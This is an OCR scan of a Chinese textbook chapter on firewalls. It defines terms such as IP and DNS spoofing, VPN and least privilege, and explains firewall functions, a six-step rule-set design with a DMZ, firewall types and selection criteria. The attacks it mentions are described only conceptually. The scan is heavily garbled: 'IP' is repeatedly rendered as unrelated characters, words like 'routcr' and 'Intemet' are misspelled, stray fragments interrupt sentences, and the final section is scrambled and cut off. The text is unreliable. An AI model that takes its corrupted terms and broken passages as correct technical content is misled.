用 户 或 用 户 的 瑟 地 址 是 否 有 权 使 用 代理 服务 器 (也 可 能 支持 其 他 的 认证 手段 )， 然 后 代表 客 
户 与 真实 服务 器 之 间 建 立 连接 。 

10) 卫 地 址 欺骗 (GP spoofing) 

这 是 一 种 黑客 的 攻击 形式 ， 黑 客 使 用 一 台 机 器 ， 而 用 另 一 台 机 器 的 他 地 址 ， 从 而 装扮 
成 另 一 台 机 器 和 服务 器 打交道 。 例 如 ， 一 个 防火 墙 不 允许 某 一 竞争 站 点 访问 该 站 点 ， 但 竞 
争 站 点 可 以 使 用 其 他 站 点 的 卫 和 服务 器 通信 ,而 服务 器 则 不 知道 与 它 通 信 的 是 竞争 站 点 的 
主机 。 

11) 隧道 路 由 器 (tunneling routcr) 

它 是 一 种 特殊 的 路 由 器 ， 可 以 对 数据 包 进 行 加 密 ， 让 数据 能 通过 非 信任 网 (如 因特网 ) 
然后 在 另 一 端 用 同样 的 路 由 器 进行 解密 。 

12) 虚拟 私 用 网 (Virtual Private Network，VPN) 

一 种 连接 两 个 远程 局 域 网 的 方式 ， 连 接 要 通过 非 信任 网 (如 因特网 )， 所 以 一 般 通 过 隧 
道路 由 器 实现 互联 。 

13) DNS 欺骗 (DNS spoofing ) 

通过 破坏 被 攻击 机 上 的 名 字 服 务 器 的 缓存 , 或 破坏 一 个 域名 服务 器 来 伪造 IP 地 址 和 主 
机 名 的 映射 ， 从 而 冒充 其 他 机 器 。 

14) 差错 与 控制 报 文 ICMP) 

它 是 TCP/IP 协议 中 的 一 种 协议 ， 建 立 在 人 P 层 上 ， 用 于 主机 之 间或 主机 在 路 由 器 之 间 
传输 错误 报 文 以 及 路 由 建议 。 

15) 纵深 防御 (Defense in Depth) 

一 种 确保 网 络 尽 可 能 安全 的 安全 措施 ， 一 般 与 防火 墙 联合 使 用 。 

16) 最 小 特权 (Least Privilege) 

在 运行 和 维护 系统 中 ， 尽 可 能 地 减少 用 户 的 特权 ， 但 同时 也 要 使 用 户 有 足够 的 权限 来 
做 事 ， 这 样 就 会 减少 特权 被 滥用 的 机 会 。 内 部 人 员 滥 用 特权 很 可 能 在 防火 墙 上 打开 一 个 安 
全 缺口 ， 这 很 危险 ， 很 多 的 入 侵 是 由 此 引起 的 。 

使 用 防火 墙 保护 的 益处 : 

(1) 所 有 风险 区 域 都 集中 在 单一 系统 即 防火 墙 上 ， 安 全 管理 者 就 可 针对 网 络 的 某 个 方 
面 进行 管理 ， 而 采取 的 安全 措施 对 网 络 中 的 其 他 区 域 并 不 会 有 多 大 影响 

(2) 监测 与 控制 装置 仅 需 安 装 在 防火 墙 中 。 

(3) 内 部 网 络 与 外 部 的 一 切 联系 都 必须 通过 防火 墙 进行 ， 因 此 防火 墙 能 够 监视 与 控制 
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所 有 联系 过 程 。 
7.1.2 ”防火 墙 的 功能 


防火 墙 对 流 经 它 的 网 络 通 信 进 行 扫描 ， 这 样 能 够 过 滤 掉 一 些 攻击 ， 以 免 其 在 目标 计算 
机 上 被 执行 。 防 火 墙 可 以 关闭 不 使 用 的 端口 ， 而 且 还 能 禁止 特定 端口 的 流出 通信 ， 封 锁 特 
洛 伊 木 马 。 最 后 ， 它 可 以 禁止 来 自 特 殊 站 点 的 访问 ， 从 而 防止 来 自 不 明 入 侵 者 的 所 有 通信 。 

1) ”防火 墙 是 网 络 安全 的 屏障 

一 个 防火 墙 (作为 阻塞 点 、 控 制 点 ) 能 极 大 地 提高 一 个 内 部 网 络 的 安全 性 ， 并 通过 过 滤 
不 安全 的 服务 而 降低 风险 。 由 于 只 有 经 过 精心 选择 的 应 用 协议 才能 通过 防火 墙 ， 所 以 网 络 
环境 变 得 更 安全 。 如 防火 墙 可 以 禁止 诸如 众所周知 的 不 安全 的 NFS 协议 进出 受 保护 网 络 ， 
这 样 外 部 的 攻击 者 就 不 可 能 利用 这 些 脆弱 的 协议 来 攻击 内 部 网 络 。 防 火 墙 同时 可 以 保护 网 
络 免 受 基于 路 由 的 攻击 ， 如 他 选项 中 的 源 路 由 攻击 和 ICMP 重 定向 中 的 重 定向 路 径 。 防 火 
墙 应 该 可 以 拒绝 所 有 以 上 类 型 攻击 的 报 文 并 通知 防火 墙 管 理 员 。 

2) ”防火 墙 可 以 强化 网 络 安全 策略 

通过 以 防火 墙 为 中 心 的 安全 方案 配置 ， 能 将 所 有 安全 软件 (如 口令 、 加 密 、 身 份 认 证 、 
审计 等 ) 配 置 在 防火 墙 上 。 与 将 网 络 安全 问题 分 散 到 各 个 主机 上 相 比 ， 防 火 墙 的 集中 安全 管 
理 更 经 济 。 例 如 在 网 络 访问 时 ， 加 密 口 令 系 统 和 其 他 的 身份 认证 系统 完全 可 以 不 必 分 散在 
各 个 主机 上 ， 而 集中 在 防火 墙 身上 。 

3) ”对 网 络 存 取 和 访问 进行 监控 审计 

如 果 所 有 的 访问 都 经 过 防火 墙 ， 那么 ， 防 火 墙 就 能 记录 下 这 些 访问 并 做 出 日 志 记 录 ， 
同时 也 能 提供 网 络 使 用 情况 的 统计 数据 。 当 发 生 可 疑 动作 时 ， 防 火 墙 能 进行 适当 的 报警 ， 
并 提供 网 络 是 否 受 到 监测 和 攻击 的 详细 信息 。 另 外 ， 收 集 一 个 网 络 的 使 用 和 误 用 情况 也 是 
非常 重要 的 。 首 先 的 理由 是 可 以 清楚 防火 墙 是 否 能 够 抵挡 攻击 者 的 探测 和 攻击 ， 并 且 清 楚 
防火 墙 的 控制 是 否 充足 。 而 网 络 使 用 统计 对 网 络 需求 分 析 和 威胁 分 析 等 而 言 也 是 非常 如 
要 的 。 

4) ”防止 内 部 信息 的 外 汇 

通过 利用 防火 墙 对 内 部 网 络 的 划分 ， 可 实现 对 内 部 网 重点 网 段 的 隔离 ， 从 而 限制 了 局 
部 重点 或 敏感 网 络 安全 问题 对 全 局 网 络 造成 的 影响 。 再 者 ， 隐 私 是 内 部 网 络 非常 关心 的 问 
题 ， 一 个 内 部 网 络 中 不 引 人 注 意 的 细节 ， 可 能 包含 了 有 关 安 全 的 线索 而 引起 外 部 攻击 者 的 
兴趣 ， 甚 至 因此 而 暴露 了 内 部 网 络 的 某 些 安全 漏洞 。 使 用 防火 墙 就 可 以 隐蔽 那些 透漏 内 部 
细节 如 Finger，DNS 等 服务 。Finger 显示 了 主机 的 所 有 用 户 的 注册 名 、 真 名 ， 最 后 登录 时 
间 和 使 用 shell 类 型 等 。 但 是 Finger 显示 的 信息 非常 容易 被 攻击 者 所 获悉 。 攻 击 者 可 以 知道 
一 个 系统 使 用 的 频繁 程度 ， 这 个 系统 是 否 有 用 户 正 在 连 线 上 网 ， 这 个 系统 是 否 在 被 攻击 时 
引起 注意 等 。 防火墙 可 以 同样 阻塞 有 关内 部 网 络 中 的 DNS 信息 , 这 样 一 台 主机 的 域名 和 下 
地 址 就 不 会 被 外 界 所 了 解 。 除了 安全 作用 , 防火 墙 还 支持 具有 Internet 服务 特性 的 企业 内 部 
网 络 技术 体系 VPN( 虚 拟 专用 网 )。 
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7.1.3 防火墙 的 规则 


建立 一 个 可 靠 的 规则 集 对 于 实现 一 个 成 功 的 、 安 全 的 防火 墙 来 说 是 非常 关键 的 一 步 。 
因为 如 果 防 火 墙 规则 集 配 置 错误 ， 再 好 的 防火 墙 也 只 是 摆设 。 在 安全 审计 中 ， 经 常 能 看 到 
一 个 巨 资 购 入 的 防火 墙 由 于 某 个 规则 配置 的 错误 而 将 机 构 暴 露 于 巨大 的 危险 之 中 。 下 面 举 
例 说 明 如 何 设计 、 建 立 和 维护 一 个 可 靠 的 、 安 全 的 防火 墙 规则 集 。 

例如 : 从 一 个 虚构 机 构 的 安全 策略 开始 ， 基 于 此 策略 ， 来 设计 一 个 防火 墙 规则 集 。 

第 一 步 : 制定 安全 策略 。 

防火 墙 和 防火 墙 规则 集 只 是 安全 策略 的 技术 实现 。 管理 层 规定 实施 什么 样 的 安全 策略 ， 
防火 墙 是 策略 得 以 实施 的 技术 工具 。 所 以 ， 在 建立 规则 集 之 前 ， 必 须 首先 理解 安全 策略 。 

第 二 步 : 搭建 安全 体系 结构 。 

作为 一 个 安全 管理 员 ， 第 一 步 是 将 安全 策略 转化 为 安全 体系 结构 。 现 在 ， 我 们 来 讨论 
把 每 一 项 安全 策略 核心 如 何 转化 为 技术 实现 。 

第 一 项 很 容易 ， 内 部 网 络 的 任何 东西 都 允许 输出 到 Internet 上 。 

第 二 项 安全 策略 核心 很 微妙 , 这 就 要 求 我 们 要 为 公司 建立 Web 和 E-mail 服务 器 。 由 于 
任何 人 都 能 访问 Web 和 E-mail 服务 器 ， 所 以 我 们 不 能 信任 它们 。 我 们 通过 把 它们 放 入 
DMZ(Demilitarized Zone， 中 立 区 ) 来 实现 该 项 策略 。DMZ 是 一 个 孤立 的 网 络 ， 通 常 把 不 信 
任 的 系统 放 在 那里 ，DMZ 中 的 系统 不 能 启动 连接 内 部 网 络 。DMZ 有 两 种 类 型 ， 有 保护 的 
和 无 保护 的 。 有 保护 的 DMZ 是 与 防火 墙 脱离 的 孤立 的 部 分 ; 无 保护 的 DMZ 是 介 于 路 由 器 
和 防火 墙 之 间 的 网 络 部 分 。 这 里 建议 使 用 有 保护 的 DMZ， 我 们 把 Web 和 E-mail 服务 器 放 
在 那里 。 

第 三 步 : 制定 规则 次 序 。 

在 建立 规则 集 之 前 ， 有 一 件 事 必须 提 及 ， 即 规则 次 序 。 哪 条 规则 放 在 哪 条 之 前 是 非常 
关键 的 。 同 样 的 规则 ， 以 不 同 的 次 序 放置 ， 可 能 会 完全 改变 防火 墙 的 运转 情况 。 很 多 防火 
Po 
息 包 时 ， 它 先 与 第 一 条 规则 相 比较 ， 然 后 是 第 二 条 、 第 三 条 …… 当 它 它 发 现 一 条 匹配 规则 时 ， 
就 停止 检查 并 应 用 那 条 规则 。 如 果 信 息 包 经 过 每 一 条 规则 而 没 pe 
会 被 拒绝 。 一 般 来 说 ， 通 常 的 顺序 是 ， 较 特殊 的 规则 在 前 ， 较 普通 的 规则 在 后 ， 防 止 在 找 
到 一 个 特殊 规则 之 前 一 个 普通 规则 便 被 匹配 ， 这 可 以 使 你 的 防火 墙 避免 配置 错误 。 

第 四 步 : 落实 规则 集 。 

选 好 素材 就 可 以 建立 规则 集 了 ， 下 面 就 简要 概述 每 条 规则 。 

@ 切断 默认 
允许 内 部 出 网 
添加 锁定 
丢弃 不 匹配 的 信息 包 
丢弃 并 不 记录 
允许 DNS 访问 
允许 邮件 访问 
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允许 Web 访问 
阻塞 DMZ 
允许 内 部 的 POP 访问 
强化 DMZ 的 规则 
允许 管理 员 访 问 
提高 性 能 
增加 IDS 
附加 规则 

你 可 以 添加 一 些 附 加 规则 , 例如 : 阻塞 与 AOL ICQ 的 连接 ， 不 要 阻塞 入 口 ， 只 阻塞 目 
的 文件 AOL 服务 器 。 

第 五 步 : 注意 更 换 控 制 。 

在 你 恰当 地 组 织 好 规则 之 后 ， 还 建议 你 写 上 注释 并 经 常 更 新 它们 。 注 释 可 以 帮助 你 明 
白 哪 条 规则 做 什么 ， 对 规则 理解 得 越 好 ， 错 误 配置 的 可 能 性 就 越 小 。 对 那些 有 多 重 防火 墙 
管理 员 的 大 机 构 来 说 ， 建 议 当 规则 被 修改 时 ， 把 下 列 信息 加 入 注释 中 ， 这 可 以 帮助 你 跟踪 
谁 修改 了 哪 条 规则 以 及 修改 的 原因 。 
规则 更 改 者 的 名 字 

@ 规则 变更 的 日 期 /时 间 

@ ”规则 变更 的 原因 

第 六 步 : 做 好 审计 工作 

当 你 建立 好 规则 集 后 ， 检 测 它 很 关键 。 我 们 所 犯 的 错误 由 好 的 管理 员 去 跟踪 并 找到 
它们 。 

防火 墙 实 际 上 是 一 种 隔离 内 外 网 的 工具 。 在 如 今 Intemet 访问 的 动态 世界 里 , 在 实现 过 
程 中 很 容易 犯错 误 。 通 过 建立 一 个 可 靠 的 、 简 单 的 规则 集 ， 你 可 以 创建 一 个 更 安全 地 被 你 
的 防火 墙 所 隔离 的 网 络 环境 。 规 则 越 简单 越 好 。 

在 我 们 深入 探讨 之 前 ， 要 强调 一 下 一 个 简单 的 规则 集 ， 是 建立 一 个 安全 的 防火 墙 的 关 
键 所 在 。 网 络 的 头号 敌人 是 错误 配置 。 为 什么 当 你 意外 地 将 消息 访问 协议 (IMAP) 公 开 时 ， 
那些 坏 家 伙 会 试图 悄悄 携带 欺骗 性 的 、 片 段 的 信息 包 通 过 你 的 防火 墙 ? 一 个 好 的 准则 最 好 
不 要 超过 30 条 。 一 旦 规则 超过 50 条 ， 你 就 会 以 失败 而 告终 。 当 你 要 从 很 多 规则 入 手 时 ， 
就 要 认真 检查 一 下 你 的 整个 安全 体系 结构 ， 而 不 仅仅 是 防火 墙 。 请 尽量 保持 你 的 规则 集 简 
洁 和 简短 ， 规 则 集 越 简洁 ， 错 误 配 置 的 可 能 性 就 越 小 ， 理 解 和 维护 就 起 容易， 系统 就 越 安 
全 。 因 为 规则 少 意 味 着 只 分 析 少 数 的 规则 , 防火 墙 的 CPU 周期 就 短 , 防火 墙 效率 就 可 以 提高 。 


7.2 防火墙 的 分 类 
目前 市 场 的 防火 墙 产品 非常 多 ,划分 的 标准 也 很 多 , 下面 简 介 几 种 从 不 同 的 角度 分 类 。 
7.2.1 按 软 、 硬 件 分 类 


软件 防火 墙 和 硬件 防火 墙 以 及 芯片 级 防火 墙 。 
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1. 软件 防火 墙 

软件 防火 墙 运行 于 特定 的 计算 机 上 , 它 需 要 客户 预先 安装 好 的 计算 机 操作 系统 的 支持 ， 
一 般 来 说 ， 这 台 计 算 机 就 是 整个 网 络 的 网 关 ， 俗 称 “ 个 人 防火 墙 ”。 软 件 防 火 墙 就 像 其 他 
的 软件 产品 一 样 需要 先 在 计算 机 上 安装 并 做 好 配置 才 可 以 使 用 。 使 用 这 类 防火 墙 ， 需 要 网 
管 对 所 工作 的 操作 系统 平台 比较 熟悉 。 

2. 硬件 防火 墙 

这 里 说 的 硬件 防火 墙 是 指 “ 所 谓 的 硬件 防火 墙 ” 。 之 所 以 加 上 “所 谓 ” 二 字 是 针对 世 
片 级 防火 墙 说 的 。 它 们 最 大 的 差别 在 于 是 否 基 于 专用 的 硬件 平台 。 目 前 市 场 上 大 多 数 防火 
墙 都 是 这 种 所 谓 的 硬件 防火 墙 ， 它 们 都 基于 PC 架构 ， 就 是 说 ， 它 们 和 普通 的 家 庭 用 的 PC 
没有 太 大 区 别 。 在 这 些 PC 架构 计算 机 上 运行 一 些 经 过 裁剪 和 简化 的 操作 系统 ， 最 常用 的 
有 老 版 本 的 UNIX、Linux 和 FreeBSD 系统 。 值 得 注意 的 是 ， 由 于 此 类 防火 墙 采用 的 依然 是 
别人 的 内 核 ， 因 此 依然 会 受到 OS( 操 作 系 统 ) 本 身 的 安全 性 影响 。 

传统 硬件 防火 墙 一 般 至 少 应 具备 三 个 端口 , 分 别 接 内 网 、 外 网 和 DMZ 区 ( 非 军 事 化 区 )， 
现在 一 些 新 的 硬件 防火 墙 往 往 扩展 了 端口 ， 常 见 四 端口 防火 墙 一 般 将 第 四 个 端口 作为 配置 
口 、 管 理 端口 。 很 多 防火 墙 还 可 以 进一步 扩展 端口 数目 。 

3. 芯片 级 防火 墙 

芯片 级 防火 墙 基于 专门 的 硬件 平台 ， 没 有 操作 系统 。 专 有 的 ASIC 芯片 促使 它们 比 其 
他 种 类 的 防火 墙 速 度 更 快 ， 处 理 能 力 更 强 ， 性 能 更 高 。 做 这 类 防火 墙 最 出 名 的 厂商 有 
NetScreen、FortiNet、Cisco 等 。 这 类 防火 墙 由 于 是 专用 OS( 操 作 系统 )， 因 此 防火 墙 本 身 的 
漏洞 比较 少 ， 不 过 价格 相对 比较 高 昂 。 


7.2.2” 按 技术 分 类 


根据 防火 墙 所 采用 的 技术 不 同 ， 我 们 可 以 将 它 分 为 三 种 基本 类 型 : 包 过 滤 型 、 应 用 代 
理 型 和 状态 监测 型 。 

1. 包 过 滤 型 防火 墙 

包 过 滤 型 防火 墙 工作 在 网 络 层 ， 对 数据 包 的 源 及 目地 卫 具有 识别 和 控制 作用 ， 对 于 传 
输 层 , 也 只 能 识别 数据 包 是 TCP 还 是 UDP 及 所 用 的 端口 信息 。 现 在 的 路 由 器 .Switch Router 
以 及 某 些 操作 系统 已 经 具有 用 Packet Filter 控制 的 能 力 。 

由 于 只 对 数据 包 的 IP 地 址 、TCP/UDP 协议 和 端口 进行 分 析 ， 包 过 滤 型 防火 墙 的 处 理 
速度 较 快 ， 并 且 易 于 配置 。 

包 过 滤 型 防火 墙 具 有 根本 的 缺陷 : 

(1) 不 能 防范 黑客 攻击 。 

包 过 滤 型 防火 墙 的 工作 基于 一 个 前 提 ， 就 是 网 管 知道 哪些 了 P 是 可 信 网 络 ， 哪 些 是 不 可 
信和 网 络 的 下 地 址 ,但 是 随 着 远程 办 公 等 新 应 用 的 出 现 ， 网 管 不 可 能 区 分 出 可 信和 网 络 与 不 可 
信和 网 络 的 界限 ， 对 于 黑客 来 说 ， 只 需 将 源 IP 包 改 成 合法 IP 即 可 轻松 通过 包 过 滤 防 火 墙 ， 
进入 内 网 ， 而 任何 一 个 初级 水 平 的 黑客 都 能 进行 人 P 地 址 欺骗 。 
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(2) 不 支持 应 用 层 协议 。 

假如 内 网 用 户 提 出 这 样 一 个 需求 ， 只 允许 内 网 员工 访问 外 网 的 网 页 (使 用 HTTP 协议 )， 
不 允许 去 外 网 下 载 电影 (一 般 使 用 FTP 协议 )。 包 过 滤 型 防火 墙 无 能 为 力 ， 因 为 它 不 认识 数 
据 包 中 的 应 用 层 协 议 ， 访 问 控制 力度 太 粗 糙 。 

(3) 不 能 处 理 新 的 安全 威胁 。 

它 不 能 跟踪 TCP 状态 ， 所 以 对 TCP 层 的 控制 有 漏洞 。 如 当 它 配置 了 仅 允 许 从 内 到 外 
的 TCP 访问 时 ， 一 些 以 TCP 应 答 包 的 形式 从 外 部 对 内 网 进行 的 攻击 仍 可 以 穿 透 防火 墙 。 

综 上 可 见 ， 包 过 滤 型 防火 墙 技术 面 太 过 初级 ， 就 好 比 一 位 保安 只 能 根据 访客 来 自 哪 个 
省 市 来 判断 是 否 允 许 他 进入 一 样 ， 难 以 履行 保护 内 网 安全 的 职责 。 

2. 应 用 代理 型 防火 墙 

应 用 代理 型 防火 墙 彻底 隔断 内 网 与 外 网 的 直接 通信 ， 内 网 用 户 对 外 网 的 访问 变 成 防火 
墙 对 外 网 的 访问 ， 然 后 再 由 防火 墙 转发 给 内 网 用 户 。 所 有 通信 都 必须 经 应 用 层 代 理 软件 转 
发 ， 访 问 者 任何 时 候 都 不 能 与 服务 器 建立 直接 的 TCP 连接， 应 用 层 的 协议 会 话 过 程 必须 符 
合 代理 的 安全 策略 要 求 。 

应 用 代理 型 防火 墙 的 优点 是 : 可 以 检查 应 用 层 、 传 输 层 和 网 络 层 的 协议 特征 ， 对 数据 
包 的 检测 能 力 比 较 强 。 

应 用 代理 型 防火 墙 的 缺点 也 非常 突出 ， 主 要 如 下 

(1) 难于 配置 。 

由 于 每 个 应 用 都 要 求 单独 的 代理 进程 ， 这 就 要 求 网 管 能 理解 每 项 应 用 协议 的 弱点 ， 并 
能 合理 的 配置 安全 策略 ， 由 于 配置 繁琐 ， 难 于 理解 ， 容 易 出 现 配置 失误 ， 最 终 影响 内 网 的 
安全 防范 能 

(2) 处 理 速度 非常 慢 。 

断 掉 所 有 的 连接 ， 由 防火 墙 重新 建立 连接 ， 理 论 上 可 以 使 应 用 代理 型 防火 墙 具 有 极 高 
的 安全 性 。 但 是 实际 应 用 中 并 不 可 行 ， 因 为 对 于 内 网 的 每 个 Web 访问 请 求 ， 应 用 代理 都 需 
要 开 一 个 单独 的 代理 进程 ， 它 要 保护 内 网 的 Web 服务 器 、 数 据 库 服务 器 、 文 件 服务 器 、 邮 
件 服务 器 及 业务 程序 等 ， 就 需要 建立 一 个 个 的 服务 代理 ， 以 处 理 客户 端的 访问 请 求 。 这 样 ， 
应 用 代理 的 处 理 延 迟 会 很 大 ， 内 网 用 户 的 正常 Web 访问 就 不 能 及 时 得 到 响应 。 

总 之 ， 应 用 代理 型 防火 墙 不 能 支持 大 规模 的 并 发 连接 ， 在 对 速度 敏感 的 行业 使 用 这 类 
防火 墙 时 简直 是 灾难 。 另 外 ， 防 火 墙 核心 要 求 预 先 内 置 一 些 已 知 应 用 程序 的 代理 ， 使 得 一 
些 新 出 现 的 应 用 在 代理 防火 墙 内 被 无 情 地 阻 断 ， 不 能 很 好 地 支持 新 应 用 。 

在 IT 领域 中 ， 新 应 用 、 新 技术 、 新 协议 层出不穷 ， 应 用 代理 型 防火 墙 很 难 适应 这 种 局 
面 。 因此 ,在 一 些 重要 的 领域 和 行业 的 核心 业务 应 用 中 ， 应 用 代理 型 防火 墙 正 被 逐渐 淘汰 。 
但 是 ， 自 适应 代理 技术 的 出 现 让 应 用 代理 型 防火 墙 技术 出 现 了 新 的 转机 ， 它 结合 了 应 用 代 
理 型 防火 墙 的 安全 性 和 包 过 滤 型 防火 墙 的 高 速度 等 优点 ， 在 不 损失 安全 性 的 基础 上 将 应 用 
代理 型 防火 墙 的 性 能 提高 了 10 倍 。 

3. 状态 检测 型 防火 墙 

Intemet 上 传输 的 数据 都 必须 遵循 TCP/IP 协议 , 根据 TCP 协议 , 每 个 可 靠 连接 的 建 
立 需 要 经 过 “客户 端 同步 请 求 ”、“ 服 务 器 应 答 ”、“ 客 户 端 再 应 答 ” 三 个 阶段 ， 常 用 到 
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的 Web 浏览 、 文 件 下 载 、 收 发 邮件 等 都 要 经 过 这 三 个 阶段 。 这 反映 出 数据 包 并 不 是 独立 的 ， 
而 是 前 后 之 间 有 着 密切 的 状态 联系 ， 基 于 这 种 状态 变化 ， 引 出 了 状态 检测 技术 。 

状态 检测 型 防火 墙 据 弃 了 包 过 滤 型 防火 墙 仅 考查 数据 包 的 下 地 址 等 几 个 参数 , 而 不 关 
心 数据 包 连 接 状态 变化 的 缺点 ， 在 防火 墙 的 核心 部 分 建立 状态 连接 表 ， 并 将 进出 网 络 的 数 
据 当成 一 个 个 的 会 话 ， 利 用 状态 表 跟 踪 每 一 个 会 话 状态 。 状 态 监测 对 每 一 个 包 的 检查 不 仅 
根据 规则 表 ， 更 考虑 了 数据 包 是 否 符合 会 话 所 处 的 状态 ， 因 此 提供 了 完整 的 对 传输 层 的 控 
制 能 力 。 

网 关 防 火 墙 的 一 个 挑战 就 是 能 处 理 的 流量 ， 状 态 检测 技术 在 大 为 提高 安全 防范 能 力 的 
同时 也 改进 了 流量 处 理 速度 。 状 态 监测 技术 采用 了 一 系列 优化 技术 ， 使 防火 墙 性 能 大 幅度 
提升 ， 能 应 用 在 各 类 网 络 环境 中 ， 尤 其 是 在 一 些 规则 复杂 的 大 型 网 络 上 。 


7.2.3 防火墙 的 选择 


1. 选择 防火 墙 须 考虑 的 基本 原则 

首先 ， 应 该 明确 你 的 目的 ， 想 要 如 何 操作 这 个 系统 ， 亦 即 只 允许 想 要 的 工作 通过 。 比 
如 ， 某 企业 只 需要 电子 函件 服务 ， 则 该 企业 将 防火 墙 设置 为 只 允许 电子 函件 服务 通过 ， 而 
禁止 FTP、WWW 等 服务 ， 还 是 允许 多 种 业务 通过 防火 墙 ， 但 要 设置 相应 的 监测 、 计 量 、 
注册 和 稿 核 等 

其 次 ， 是 想 要 达到 什么 级 别 的 监测 和 控制 。 根 据 网 络 用 户 的 实际 需要 ， 建 立 相 应 的 风 
险 级 别 ， 随 之 便 可 形成 一 个 需要 监测 、 允 许 、 禁 止 的 清单 。 再 根据 清单 的 要 求 来 设置 防火 
省 的 各 项 功能 。 

第 三 ， 是 费用 问题 。 在 市 场 上 ， 防 火 墙 的 售 价 极为 悬殊 ， 从 儿 万 元 到 数 十 万 元 ， 其 至 
到 吾 万 元 。 因 为 各 企业 用 户 使 用 的 安全 程度 不 尽 相同 ,因此 厂商 所 推出 的 产品 也 有 所 区 分 ， 
甚至 有 些 公司 还 推出 类 似 模块 化 的 功能 产品 ， 以 符合 各 种 不 同 企业 的 安全 要 求 。 安 全 性 越 
高 ， 实 现 越 复杂 ， 费 用 也 相应 越 高 ， 反 之 费用 较 低 。 这 就 需要 对 网 络 中 需 保护 的 信息 和 数 
据 进行 详细 的 经 济 性 评估 。 一 般 网 络 安全 防护 系统 的 造价 占 需 保 护 资源 价值 的 1% 左 右 。 记 
以 在 装配 防火 墙 时 ， 费 用 与 安全 性 的 折 中 是 不 可 避免 的 ， 这 也 就 决定 了 “绝对 安全 ”的 防 
火 墙 是 不 存在 的 。 但 是 可 以 在 现 有 经 济 条 件 下 尽 可 能 科学 地 配置 各 种 防御 措施 ， 使 防火 墙 
充分 发 挥 作用 。 

2. 选择 防火 墙 的 基本 标准 

广义 地 说 ， 只 要 是 能 够 限制 封包 通行 的 网 络 设备 ， 或 安装 在 各 种 操作 系统 上 的 软件 都 
可 以 用 来 当 作 防 火 墙 。 我 们 可 以 由 不 同 特性 的 防火 墙 设计 方式 来 评估 各 种 防火 墙 是 否 足够 
安全 ， 以 及 能 否 满足 企业 的 安全 需求 。 具 体 说 来 ， 有 以 下 几 类 指标 。 

D ”防火墙 的 管理 难 易 度 

防火 墙 的 管理 难 易 度 也 是 防火 墙 能 否 达到 目的 的 主要 考虑 因素 之 一 。 若 防火 墙 的 管理 
过 于 困难 ， 则 可 能 会 造成 设 定 上 的 错误 ， 反 而 不 能 达到 其 功能 。 一 般 企业 之 所 以 很 少 以 已 
有 的 网 络 设备 直接 当 作 防 火 墙 的 原因 ， 除 了 先前 提 到 的 包 过 滤 ， 并 不 能 达到 完全 的 控制 之 
外 ， 设 定 工作 困难 、 必 须 具备 完整 的 知识 以 及 不 易 出 错 等 管理 问题 ， 更 是 一 般 企业 不 愿意 
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大 多 数 人 在 选择 防火 墙 时 都 将 注意 力 放 在 防火 墙 如 何 控 制 连 接 以 及 防火 墙 支 持 多 少 种 
服务 ， 但 往往 忽略 一 点 ， 防 火 墙 也 是 网 络 上 的 主机 之 一 ， 也 可 能 存在 安全 问题 ， 防 火 墙 如 
果 不 能 确保 自身 安全 ， 则 防火 墙 的 控制 功能 再 强 ， 也 终究 不 能 完全 保护 内 部 网 络 。 

大 部 分 防火 墙 都 安装 在 一 般 的 操作 系统 上 ， 如 Unix、NT 系统 等 。 在 防火 墙 主机 上 执 
行 的 除了 防火 墙 软件 外 ， 所 有 的 程序 、 系 统 核心 ， 也 大 多 来 自 于 操作 系统 本 身 的 原 有 程序 。 
当 防 火 墙 上 所 执行 的 软件 出 现 安全 漏洞 时 ， 防 火 墙 本 身 也 将 受到 威胁 。 此 时 ， 任 何 的 防火 
墙 控 制 机 制 都 可 能 失效 ， 因 为 当 一 个 黑客 取得 了 防火 墙 上 的 控制 权 以 后 ， 黑 客 几乎 可 为 所 
欲 为 地 修改 防火 墙 上 的 存 取 规则 (Access Rule)， 进 而 侵入 更 多 的 系统 。 因 此 ， 防 火 墙 自身 仍 
应 有 相当 高 的 安全 保护 。 

3) NCSC 的 认证 标准 

我 们 常会 看 到 或 听 到 某 些 防火 墙 具 有 A、B、C 级 等 安全 等 级 规范 。 安 全 等 级 规范 是 怎 
么 一 回 事 ? 白皮书 是 美国 国家 安全 局 (NSA) 的 国家 电脑 安全 中 心 (NCSC) 颁 布 的 官方 标准 ， 
它 将 一 个 电脑 系统 可 接受 的 信任 程度 予以 分 级 ， 依 安全 性 由 高 至 低 划 分 为 A、B、C、D 四 
个 等 级 ， 这 些 安全 等 级 不 是 线性 的 ， 而 是 以 指数 级 上 升 的 。 

4) “最 好 能 弥补 其 他 操作 系统 之 不 足 

一 个 好 的 防火 墙 必须 是 建立 在 操作 系统 之 前 而 不 是 在 操作 系统 之 上 ， 所 以 操作 系统 有 
的 漏洞 可 能 并 不 会 影响 到 一 个 好 的 防火 墙 系统 所 提供 的 安全 性 ， 由 于 硬件 平台 的 普及 以 及 
执行 效率 的 因素 ， 大 部 分 企业 均 会 把 对 外 提供 各 种 服务 的 服务 器 分 散 至 许多 操作 平台 上 ， 
但 我 们 在 无 法 保证 所 有 主机 安全 的 情况 下， 选择 防火 墙 作 为 整体 安全 的 保护 者 ， 这 正 说 明 
了 操作 系统 提供 了 B 级 或 是 C 级 的 安全 并 不 一 定 会 直接 对 整体 安全 造成 影响 ， 因 为 一 个 好 
的 防火 墙 必须 能 弥补 操作 系统 的 不 足 。 


5) 


能 和 否 为 使 用 者 提供 不 同 平台 的 选择 
由 于 防火 墙 


非 完全 由 硬件 构成 ， 所 以 软件 (操作 系统 ) 所 提供 的 功能 以 及 执行 效率 一 


定 会 影响 到 整体 的 表现 ， 而 使 用 者 的 操作 意愿 及 熟悉 程度 也 是 必须 考虑 的 重点 。 因 此 一 个 
好 的 防火 墙 不 但 本 身 要 有 良好 的 执行 效率 ， 也 应 该 提供 多 平台 的 执行 方式 供 使 用 者 选择 ， 
毕竟 使 用 者 才 是 完全 的 控制 者 ， 应 该 选择 一 套 符合 现 有 环境 需求 的 软件 ， 而 非 为 了 软件 的 
限制 而 改变 现 有 环境 。 


9) 
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由 于 有 新 的 产品 出 现 ， 那 么 就 有 人 会 研究 新 的 破解 方法 ， 所 以 一 个 好 的 防火 墙 提供 者 
必须 有 一 个 庞大 的 组 织 作为 使 用 者 的 安全 后 盾 ， 也 应 该 有 众多 的 使 用 者 所 建立 的 口碑 为 防 
火 墙 作 见 证 。 

7) ”应 该 考虑 企业 的 特殊 需求 

企业 安全 政策 中 往往 有 些 特殊 需求 不 是 每 一 个 防火 墙 都 会 提供 的 ， 这 方面 常常 成 为 选 


择 防火 墙 的 考虑 
(1) 下 地 址 


F 行 IP 地 


过 


因素 之 一 ， 常 见 的 需求 如 下 : 


转换 (IP Address Translation)。 


